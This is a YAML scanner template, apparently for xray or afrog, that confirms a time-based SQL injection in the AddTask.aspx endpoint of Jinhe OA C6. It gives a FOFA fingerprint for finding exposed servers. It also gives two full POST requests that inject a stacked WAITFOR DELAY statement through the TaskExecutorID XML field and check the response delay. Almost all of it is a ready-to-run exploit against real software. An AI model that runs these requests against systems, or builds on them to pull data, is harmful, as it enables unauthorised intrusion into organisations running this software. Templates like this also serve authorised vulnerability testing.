漏洞描述
金和OA C6 AddTask.aspx 接口处存在SQL注入漏洞
fofa:icon_hash="1259797304"
id: jinhe-oa-addtask-sqli
info:
name: 金和OA-AddTask.aspx存在SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |
金和OA C6 AddTask.aspx 接口处存在SQL注入漏洞
fofa:icon_hash="1259797304"
reference:
- https://mrxn.net/jswz/jhsoft-AddTask-sqli-xxe.html
tags: jinhe,oa,sqli
created: 2025/08/19
set:
hostname: request.url.host
rules:
r0:
request:
method: POST
path: /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/
headers:
Content-Type: application/xml
body: |
<root>
<Page>
<PageName>TaskDetect</PageName>
</Page>
<StartTime>2025-01-01 00:00:00</StartTime>
<EndTime>2025-01-01 00:00:00</EndTime>
<TaskExecutorID>3');WAITFOR DELAY'0:0:5'-- </TaskExecutorID>
</root>
expression: response.status == 200 && response.latency <= 7000 && response.latency >= 5000
r1:
request:
method: POST
path: /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/
headers:
Content-Type: application/xml
body: |
<root>
<Page>
<PageName>TaskDetect</PageName>
</Page>
<StartTime>2025-01-01 00:00:00</StartTime>
<EndTime>2025-01-01 00:00:00</EndTime>
<TaskExecutorID>3');WAITFOR DELAY'0:0:10'-- </TaskExecutorID>
</root>
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1()